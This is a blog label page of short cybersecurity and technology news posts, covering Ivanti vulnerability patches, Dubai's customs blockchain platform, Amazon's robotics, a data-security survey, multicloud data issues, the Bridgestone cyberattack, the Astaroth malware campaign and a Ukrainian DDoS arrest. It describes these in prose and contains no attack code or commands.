Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Data Management. Show all posts
Vulnerabilities and Exploits
Authentication Data Management Ivanti Security Updates Vulnerabilities and Exploits

Critical Security Flaw Discovered in Ivanti Virtual Traffic Manager


 

Ivanti, a leading company in network and security solutions, has issued urgent security updates to address a critical vulnerability in its Virtual Traffic Manager (vTM). The flaw, identified as CVE-2024-7593, carries an alarming severity with a CVSS score of 9.8 out of 10, signalling its potential risk to users.

Authentication Bypass Could Lead to Rogue Admin Access

The vulnerability arises from an incorrect implementation of the authentication algorithm in Ivanti vTM, excluding specific versions (22.2R1 and 22.7R2). This flaw allows remote attackers to bypass authentication processes, enabling them to create unauthorized administrative users. This could grant cybercriminals full control over the management interface, posing daunting risks to the affected systems.

Affected Versions and Immediate Actions

The vulnerability impacts several versions of Ivanti vTM, including 22.2, 22.3, 22.3R2, 22.5R1, 22.6R1, and 22.7R1. Ivanti has responded by releasing patched versions—22.2R1, 22.7R2, and upcoming fixes for 22.3R3, 22.5R2, and 22.6R2, expected during the week of August 19, 2024. As a temporary measure, the company recommends that users limit admin access to the management interface or restrict it to trusted IP addresses to mitigate the risk of unauthorised access.

Despite no confirmed incidents of this vulnerability being exploited in the wild, the availability of a proof-of-concept (PoC) code increases the urgency for users to apply the latest patches to safeguard their systems.

Additional Vulnerabilities Addressed in Neurons for ITSM

In addition to the vTM flaw, Ivanti has also patched two serious vulnerabilities in its Neurons for ITSM product. The first, CVE-2024-7569, is an information disclosure vulnerability with a CVSS score of 9.6. It affects Ivanti ITSM on-premises and Neurons for ITSM versions 2023.4 and earlier, allowing attackers to obtain sensitive information, including OIDC client secrets, through debug data.

The second flaw, CVE-2024-7570, rated 8.3 on the CVSS scale, involves improper certificate validation. This vulnerability enables a remote attacker in a man-in-the-middle (MITM) position to craft a token that could grant unauthorised access to the ITSM platform as any user. These issues have been resolved in the latest patched versions of 2023.4, 2023.3, and 2023.2.

Further adding to the urgency, Ivanti has also addressed five high-severity vulnerabilities (CVE-2024-38652, CVE-2024-38653, CVE-2024-36136, CVE-2024-37399, and CVE-2024-37373) in its Avalanche product. These flaws could potentially lead to denial-of-service (DoS) conditions or even remote code execution if exploited. Users are strongly advised to update to version 6.4.4, which includes fixes for these issues.

These security updates highlight the critical practicality of staying current with patches and updates, especially for systems as vital as traffic management and IT service management platforms. Ivanti's quick response to these vulnerabilities is crucial in helping organisations protect their digital infrastructure from potentially devastating attacks. Users are urged to implement the recommended updates without delay to combat any risks posed by these newly discovered flaws.


Read more »
Middle East
Blockchain Blockchain Security Blockchain Technology Customs and Excise Act Cyber Security Data Management Dubai Middle East

Dubai Customs Introduces Blockchain Platform to Streamline Commerce

 

Dubai Customs has recently unveiled a new blockchain platform aimed at streamlining commercial activities in the region, reinforcing its status as a technology-forward market. This initiative seeks to address and overcome obstacles hindering entrepreneurship in Dubai by leveraging blockchain technology to enhance transparency and facilitate secure data sharing. 

The newly introduced platform promises to offer secure and cost-effective solutions along with technology-driven logistics initiatives. Sultan Ahmed bin Sulayem, Chairman of Dubai’s Ports, Customs, and Free Zone Corporation, described the platform as a significant advancement in improving business and commercial operations in Dubai. “We are confident that the adoption of modern technologies such as blockchain will greatly contribute to enhancing the business environment and solidifying Dubai’s position as a key global trade hub,” Sulayem stated. 

Blockchain technology, or distributed ledger technology, distributes data across multiple nodes, thus avoiding centralization on a single server as seen in traditional systems. This feature significantly enhances security by making it difficult for malicious actors to infiltrate the network. Additionally, any information stored on blockchain networks is immutable, promoting transparency in business operations. 

Dubai officials are also keen on utilizing other blockchain features such as live tracking of goods and preventing fraud and counterfeiting. This is not the first time Dubai has explored blockchain technology. In May, a plan was revealed to position the region as one of the top ten economies proficient in metaverse technology. In a previous effort, Dubai collaborated with the Solana Foundation to establish a blockchain framework for its free economic zone, the Dubai Multi Commodities Centre (DMCC), in October 2023. This collaboration aimed to assist businesses in expanding their operations by leveraging blockchain technology. 

The new platform by Dubai Customs is expected to revolutionize the way businesses operate in the region, providing a more secure, transparent, and efficient environment for commercial activities. As Dubai continues to integrate cutting-edge technologies, it strengthens its position as a leading global trade hub and a beacon of innovation in the Middle East.
Read more »
Workforce
Data Management Employee Security Robots Technology Workforce

Second Largest Employer Amazon Opts For Robots, Substituting 100,000 Jobs

 

Amazon.com Inc. is swiftly increasing the use of robotics, with over 750,000 robots functioning alongside its employees. 

There are 1.5 million people at the second-largest private company in the world. Even if it's a large number, it represents a drop of more than 100,000 jobs from the 1.6 million it had in 2021. In the meanwhile, the company employed 200,000 robots in 2019 and 520,000 in 2022. Amazon is gradually cutting back on employees whilst it adds hundreds of thousands of robots annually. 

The robots, which include new models such as Sequoia and Digit, are designed to execute repetitive duties, boost productivity, safety, and delivery speed for Amazon customers. Sequoia, for example, speeds inventory management and order processing at delivery centres, whereas Digit, a bipedal robot developed in collaboration with Agility Robotics, handles positions such as transporting empty tote boxes. 

Amazon's significant investment in robots illustrates the company's commitment to supply chain innovation as well as its belief in the synergistic potential of human-robot collaboration. Despite the vast amount of automation, Amazon stresses that deploying robots has led to the creation of new skilled job categories at the company, mirroring a larger industry trend of integrating innovative technologies with human workforces. 

Amazon's deployment of more than 750,000 robots marks a huge step towards automation at the world's second-largest employer. The move has the potential to drastically alter job dynamics within the organisation and outside. While Amazon claims that robots are designed to collaborate with human employees, assisting them with repetitive chores to increase productivity and workplace safety, concerns about job displacement and the consequences for the workforce are unavoidable. 

The tech giant's integration of robots like Sequoia and Digit into its fulfilment centres is part of a larger drive to enhance supply chain operations using innovative technologies. The robots are intended to streamline processes and provide quicker delivery times to customers. The company emphasises that robotic solutions promote workplace safety and enable it to provide a wider range of products for same-day or next-day delivery. 

The introduction of so many robots into the workplace raises concerns about the future role of human labour in Amazon's operational paradigm. Many people are concerned about the impact on occupations, particularly highly repetitive tasks that could be easily mechanised. Research from universities such as the Massachusetts Institute of Technology (MIT) has found that industrial robots have a major detrimental impact on workers, hurting jobs and salaries in the areas where they are deployed. The broader discussion of automation's economic and political ramifications emphasises common concerns about job displacement and the possibility of higher income inequality. 

Despite these worries, Amazon has noted the emergence of 700 categories of skilled job kinds that did not previously exist at the company, implying that automation can also result in the creation of new forms of employment prospects. This change in Amazon's workforce may indicate a shift in the nature of labour, with human employees moving towards more complicated, non-repetitive jobs that demand higher levels of ability and creativity.
Read more »
security threat
Cyber Security Data Management Data Safety IT Leaders security threat

Over Fifty Percent Businesses Feel Security Element is Missing in Their Data Policy

 

These days, the average business generates an unprecedented amount of data, and this amount is only expected to increase. 

According to a new report from Rubrik Zero Labs, this makes data security - an absolute must for any successful business - a Herculean task that will only become more difficult. 

The company discovered that a typical organisation's data has grown by nearly half (42%) in the last 18 months. Overall, data from SaaS grew the most (145%), followed by cloud (73%), and on-premises endpoints (20%). A typical organisation has 240 backend terabytes (BETB) of data volume, which Rubrik expects to increase by 100 BETB in the next year and by 7x in the next five years. 

Outpacing security practises 

A significant portion of this data is classified. Global organisations have an average of 24.8 million sensitive data records, with 61% storing them in multiple locations (cloud, on-premises, and SaaS). Only 4% have secure data storage facilities. 

Over fifty percent (53%) lost sensitive information in the last year, with 16% experiencing multiple data loss incidents in the previous year. The majority of the time, organisations would lose personally identifiable information (38%), company financial information (37%), and authentication credentials (32%). 

Worryingly, two-thirds of respondents (66%) said their company's data is increasing faster than their ability to control it. Almost every company (98%) have visibility issues, and two-thirds (62%) have difficulty complying with laws and regulations. More than half (54%) have only one senior executive responsible for data security.

According to the report, there is a notable disparity between the perceptions of IT leaders in India and security. Of them, 49% believe that their organization's data policy lacks security, and 30% believe that their organisation faces a significant risk of losing sensitive data in the next 12 months. 

As per the report, 34% of Indian IT leaders believe that their organization's data is at greater risk from malicious hackers, and 54% of them admit that their capacity to handle data security risks has not kept up with the increasing amount of data. 

Rubrik commissioned the study, which was carried out by Wakefield Research among more than 1,600 IT and security decision-makers at firms with 500 or more employees. Half of those polled were CIOs and CISOs, while the other half were Vice Presidents and directors of IT and security. According to the statement, the survey supplemented Rubrik telemetry by examining more than 5,000 clients from 22 industries and 67 countries. 

The report, according to Abhilash Purushothaman, Vice-President & General Manager, Rubrik (Asia), serves as a wake-up call for Indian IT leaders. It highlights the greater risks for private data, particularly in the face of rapidly changing, sophisticated ransomware attacks, he added.
Read more »
Online Security
Cloud Security Cyber Security Data Integration Data Management Multicloud Deployments Online Security

Data: A Thorn in the Flesh for Most Multicloud Deployments

 

Data challenges, such as data integration, data security, data management, and the establishment of single sources of truth, are not new. Combining these problems with multicloud deployments is novel, though. With a little forethought and the application of widespread, long-understood data architecture best practices, many of these issues can be avoided. 

The main issue is when businesses seek to move data to multicloud deployments without carefully considering the typical issues that are likely to occur.

Creating data silos 

It can be challenging to integrate and a number of cloud services, which might lead to isolated data silos. Nobody should be surprised, but multicloud has increased the number of data silos in various ways. These need to be addressed using data integration techniques including utilising data integration technologies, data abstraction/virtualization, or other strategies that are currently widely known. Or simply avoid creating silos in your data storage systems. 

Ignoring data security 

The complexity of ensuring the protection of sensitive data across many cloud services frequently increases security threats. It is crucial to have a solid data security plan in place that takes into account the particular security requirements of each cloud service without adding to the difficulty of handling data security. This frequently entails employing a central security manager or other technology that is available over the public cloud provider, also known as a supercloud or metacloud, to abstract native security functions. This layer of logical technology, which is located above the clouds, is a concept that is now in flux.  

Not using centralised data management 

If you try to handle everything manually, managing data across many cloud services can be a resource-intensive effort. A centralised system for managing data must be in place, able to handle various data sources and guarantee data consistency. Once more, this needs to be centrally managed and abstracted above native data management implementations and public cloud service providers. Data complexity must be managed according to your terms, not those of the data complexity itself. The latter is what the majority choose, which is a grave error. 

The difficult thing about all of these problems is that they are incredibly solvable thanks to enabling technologies and proven solution patterns. Enterprises commit stupid errors by rushing to multicloud deployments as rapidly as they can, and then they fail to see the ROI from multicloud or cloud migrations in general. Self-inflicted injuries account for the majority of the harm. Make sure you do your homework. Plan. Use the appropriate technologies. It is not difficult, and in the long run, it will save you and your company a tonne of time and money.
Read more »
US Firms
Bridgestone Americas Corporate Networks Cyber Attacks Data Management Employee Factory shutdown US Firms

Cyber Attack on Bridgestone Lead to Plant Closures Across North America & Latin America

 

After sending workers home for several days, Bridgestone-Firestone tyre manufacturers across North America and Latin America are still fighting to recuperate from a cyberattack. 

Despite numerous attempts for comment, the corporation has remained silent. However, the factory's union, USW 1155L, used Facebook to inform employees that the company was still dealing with the cyberattack and that nobody needed to come in. 

The union wrote on Monday, "Warren hourly teammates who are scheduled to work day shift, March 1st, will not be required to report to work (no-hit, no pay, or you have the option to take a vacation)". 

The outages were originally reported on Sunday when the union posted on Facebook that Bridgestone Americas was investigating a potential source of the information security incident. The notice looked to be sent straight from the firm, rather than from the union. 

The company explained, "Since learning of the potential incident in the early morning hours of February 27, we have launched a comprehensive investigation to quickly gather facts while working to ensure the security of our IT systems. Out of an abundance of caution, we disconnected many of our manufacturing and retreading facilities in Latin America and North America from our network to contain and prevent any potential impact, including those at Warren TBR Plant. First shift operations were shut down, so those employees were sent home." 

"Until we learn more from this investigation, we cannot determine with certainty the scope or nature of any potential incident, but we will continue to work diligently to address any potential issues that may affect our operations, our data, our teammates, and our customers." 

The firm reiterated on Tuesday evening that hourly staff scheduled to work on Wednesday will not be required to report to work. Bridgestone Americas employs nearly 50,000 people in dozens of locations across North America, Central America, and the Caribbean. Outages affecting factories in Iowa, Illinois, North Carolina, South Carolina, Tennessee, and Canada were reported by local news outlets across the United States.
Read more »
Windows 10
Astaroth Data Management email spam JavaScript malware Microsoft Security Windows 10

Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


A malware group that goes by the name of ‘Astaroth’ has re-emerged stronger and stealthier than before. This group has been known for exploiting Microsoft Windows tools to further the attack.

Microsoft had gotten aware of these methods and exposed the malware group and its “living-off-the-land” tactics. But the malware resurfaced with a hike in activity and better techniques.

Reportedly, the Windows Management Instrumentation Command-line (WMIC) is the built-in tool that got used the last time as was spotted by the Windows Defender ATP.

Per sources, the analysis done by Microsoft led to the discovery of a spam operation that spread emails with links to websites hosting a “.LNK” shortcut file which would instruct the WMIC and other Windows tools to run “fileless” malware in the memory well out of the reach of the anti-malware.

Sources indicate that having learnt from mistakes, Astaroth now entirely dodges the use of the WMIC. January and February showed a rise in activity.

According to sources, the new styled campaign still commences with a spam email comprising of a malicious website hosting link, LNK file but it the new version it employs a file attribute, “Alternate Data Streams” (ADS), that lets the attacker clip data to a file that already exists so that hiding malicious payloads gets easier.

Per source reports, the first step of the campaign which is a spam email reads, “Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes”. The link is an archive file marked as, “Arquivo_PDF_.zip”.

It manipulates the ExtExport.exe to load the payload which per researchers is a valid process and an extremely unusual attack mechanism.

Once the victim clicks on the LNK file with the .zip file in it, the malware runs an obfuscated BAT command line, which releases a JavaScript file into the ‘Pictures’ folder and commands the explorer.exe that helps run the file.

Researchers mention and sources confirm that using the ADS permits the stream data to stay unidentifiable in the File Explorer, in this version Astaroth reads and decrypts plugins from ADS streams in desktop.ini that let Astaroth to rob email and browser passwords. It also unarms security software.

Per sources, the plugins are the “NirSoft WebBrowserPassView” tool is for regaining passwords and browsers and the “NirSoft MailPassView” tool is for getting back the email client passwords.

This is not the only legitimate tool Astaroth exploits. A command-line tool that goes by the name of “BITSAdmin” which aids admins to create download and upload jobs with tracking their progress is exploited to download encrypted payloads.

Reportedly, Astaroth has previously wreaked havoc on continents like Asia, North America, and Europe.

Read more »
DDOS Attacks
Cyber Security Data Management DDOS Attacks

Teenager Arrested for DDoS Attack in Ukraine


Ukranian Police arrested a 16 yrs old teenager last month on charges of attacking a local Internet Service Provider (ISP) to gain personal information about the users. The police (Ukranian) says that the teen used the technique of DDoS (distributed denial of service) attacks to take down the local ISP. This happened after the local ISP refused to give the teenager the details of the user. The severity of the attack made the ISP contact law enforcement last year to resolve the issue.


"The officers at Ukraine Cyber Police hunted down the 16 yr old attacker in the city of Odesa in January," said the spokesperson for the Ministry of Internal Affairs in a conversation with ZDNet. We explored the teen's home and confiscated all the devices. Upon investigation, the teen was found guilty of the attack. According to the authorities that conducted the preceding inspection of the defendant's system, the authorities found software that the teen used to launch the DDoS attacks. Besides this, details of 20 different accounts related to distinct hacker forums were also found," said the Cyber Police of Ukraine in a statement.

 As per the Criminal Law of Ukraine, the person found guilty of DDoS attack faces imprisonment for up to 5 yrs in jail. However, the teen is not charged for the attempt of extortion to the ISP. The Ukrainian Police has denied releasing any further information regarding the case. It has also not disclosed the person affected by the DDoS attack saying, "the investigation is still in process." It is not the first incident where a DDoS attack was performed to steal user information.

 In several other cases, the hackers were able to take down the ISP network using a simple technique like DDoS Botnet. Other instances similar to this case appeared in countries like Cambodia, Liberia, and various other countries in South Africa. As per the observations, to perform attacks on massive scales of Junk Traffic, the hackers use DDoS Botnet, which is very capable. This happened in Liberia. Carpet Bombing is another efficient technique to perform such attacks (as per the incidents that happened in South Africa).
Read more »
Subscribe to: Posts (Atom)